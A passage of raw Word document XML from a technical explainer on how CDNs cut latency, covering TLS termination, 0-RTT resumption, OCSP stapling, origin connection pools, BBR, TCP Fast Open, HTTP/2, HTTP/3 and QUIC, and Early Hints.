      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN TLS termination eliminates propagation delay from the handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294CE1C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3D259" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9999CA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Client (Tokyo) → TLS handshake → Origin (Virginia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ADC516" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  1 RTT TCP + 1 RTT TLS 1.3 = 2 RTTs × 150ms = 300ms before first byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E8349" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="64AF3407" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>With CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306BDD56" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Client (Tokyo) → TLS handshake → CDN Edge (Tokyo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3516F48D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  1 RTT TCP + 1 RTT TLS 1.3 = 2 RTTs × 2ms = 4ms before first byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB08390" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="2AB409F3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  CDN Edge (Tokyo) → already-established persistent connection → Origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE7290" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  No handshake overhead — connection is pre-warmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ADDC7F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session resumption and 0-RTT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0DA57" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>TLS 1.3 supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0-RTT resumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — the client sends application data (HTTP request) in the very first packet, without waiting for handshake completion. The CDN maintains session tickets for recently connected clients. Returning visitors have zero handshake latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F50C27" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>0-RTT data is vulnerable to replay attacks (the first packet can be replayed by an attacker). CDNs restrict 0-RTT to idempotent requests (GET, HEAD) and implement anti-replay mechanisms (server-side nonce tracking, or accepting replays for truly idempotent requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE01820" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OCSP Stapling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A4317" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>During TLS, clients must verify the server's certificate hasn't been revoked. Without stapling, the client queries the CA's OCSP responder — an additional DNS lookup + HTTP request adding 50–200ms. The CDN performs OCSP checks periodically (every few hours) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>staples</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> the signed OCSP response to the TLS handshake. Clients get revocation status instantly, without their own OCSP request. Both latency (no additional round trip) and privacy (CA doesn't learn which clients are connecting) improve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC9D6C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate management at scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F030CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A CDN serving thousands of customer domains manages tens of thousands of TLS certificates simultaneously. Each certificate must be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8CBFA1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Provisioned (via ACME/Let's Encrypt or customer-uploaded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA03BD6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Validated and stored securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D244B00" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Renewed before expiry (automated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145DF2B4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Served at TLS negotiation time by selecting the correct certificate based on SNI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334A39A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The SNI-based certificate selection operates at connection initiation — the client sends the target hostname in the ClientHello before TLS is established. The CDN has milliseconds to look up the correct certificate from its certificate store (typically a high-performance key-value store with in-memory caching).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45753E56" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP Optimization — Connection Management at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE53897" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-established connections to origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8E069" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN edge maintains </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistent, pre-warmed TCP connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> to origin servers. Connection establishment (TCP handshake + TLS handshake) is done once during idle periods, not on demand when a cache miss occurs. When a cache miss requires an origin fetch, a connection is immediately available from the pool — no handshake latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885D0AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The connection pool per edge node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A316A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7BE2F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge PoP → Origin: maintained connection pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D37E48B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  min_connections: 10    (always maintain at least 10 connections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44478FAC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  max_connections: 1000  (never exceed 1000 simultaneous connections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F97E6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  idle_timeout: 300s     (close connections idle for &gt;5 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565300EF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  max_lifetime: 3600s    (replace connections after 1 hour regardless of activity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957BB5F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>For a CDN with 5,000 edge nodes, each maintaining 10 idle connections to origin: 50,000 persistent connections from CDN to origin. The origin must be configured to handle this connection count — Linux's net.core.somaxconn, ulimit -n, and database connection limits must accommodate CDN-to-origin connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC1097" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP BBR congestion control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD54BF8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN operators configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR (Bottleneck Bandwidth and RTT)</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> on their edge servers rather than the default CUBIC. BBR's model-based approach (estimating bottleneck bandwidth and RTT directly rather than relying on packet loss signals) provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D03E23" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Better throughput on high-BDP paths:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Intercontinental HTTPS connections between CDN and origin benefit significantly. BBR fills the pipe faster after connection establishment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ECA4C6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lower latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> BBR avoids filling network buffers (buffer bloat) — it maintains the minimum necessary in-flight data. CUBIC's loss-based approach fills buffers before detecting congestion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A1486" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Google's deployment of BBR on YouTube's CDN infrastructure improved throughput by 4% globally and 75% in Japan — dramatically reducing rebuffering for video streaming on high-latency paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972354A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP Fast Open (TFO):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D734534" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>TCP Fast Open allows data to be sent in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYN packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> itself, eliminating one RTT for the first request of a new connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32B641" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686B7B2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Standard TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294230EF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  SYN →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C11AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">       ← SYN-ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461ECCF3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ACK + HTTP Request →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A95B9F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  (1 RTT before request is received by server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CB854" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="30A858FD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>TCP Fast Open:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456AC005" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  SYN + HTTP Request + TFO cookie →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B555F0D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  (0 RTTs — request in first packet, server can respond immediately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C4A65" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>TFO requires a </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (random token issued by the server on the first connection, presented by the client on subsequent connections to prove it's not a spoofed IP). CDN edges support TFO for connections to clients and use it for connections to origin where supported. The gain is one RTT — significant at 150ms intercontinental latency, negligible at 1ms local PoP latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2EC1E9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 and HTTP/3 — Protocol Acceleration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD1CA7C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 at the CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51AB6B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN edges speak HTTP/2 to clients (modern browsers support H2 universally over HTTPS) and translate to HTTP/1.1 or HTTP/2 for origin connections. Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A26CD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Header compression (HPACK):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> HTTP headers are compressed using a static table (common headers) and a dynamic table (previously seen header values). A User-Agent header sent on every request is sent in full once, then referenced by index (~1 byte) on subsequent requests. Header overhead drops from 500–2000 bytes per request to 50–200 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F54EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiplexing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Multiple requests travel over a single TCP connection simultaneously. The CDN sends multiple origin requests over one connection rather than maintaining one connection per in-flight request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1709C265" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server Push:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> The CDN can proactively push resources the client will need. In practice, server push is largely deprecated (Chrome removed it in 2022) — Early Hints (103) is the replacement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C735C4E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/3 and QUIC at the CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8FE58" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cloudflare, Fastly, and Akamai support HTTP/3 (HTTP over QUIC) for client-facing connections. Key advantages for CDN use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E323FED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Zero RTT resumption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> QUIC clients resuming a recent session can send HTTP requests in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — before any handshake completes. For repeat visitors (the majority of CDN traffic), connection establishment overhead is eliminated entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB254A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Connection migration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> QUIC connections are identified by Connection ID, not by the 4-tuple. Mobile users switching from WiFi to cellular maintain their QUIC connection to the CDN edge — the edge sees the new source IP but recognizes the Connection ID. HTTP downloads, video streams, and API calls continue without interruption. TCP connections break and require reconnection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64625894" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>No head-of-line blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve"> HTTP/2 over TCP suffers from TCP-level head-of-line blocking — one lost packet blocks all streams until retransmission arrives. QUIC's per-stream reliable </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>delivery means a lost packet for Stream 1 doesn't block Streams 2, 3, or 4. On lossy networks (mobile, congested WiFi), HTTP/3 dramatically outperforms HTTP/2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED17A8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early Hints (103):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B16578" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E737A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP/1.1 103 Early Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0E2B7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Link: &lt;/style.css&gt;; rel=preload; as=style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703666B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Link: &lt;/app.js&gt;; rel=preload; as=script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E5077" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="2A31E00A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>[processing continues on server...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CAE62" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="226ABBC5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B24A0F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content-Type: text/html</w:t>
      </w:r>
    </w:p>
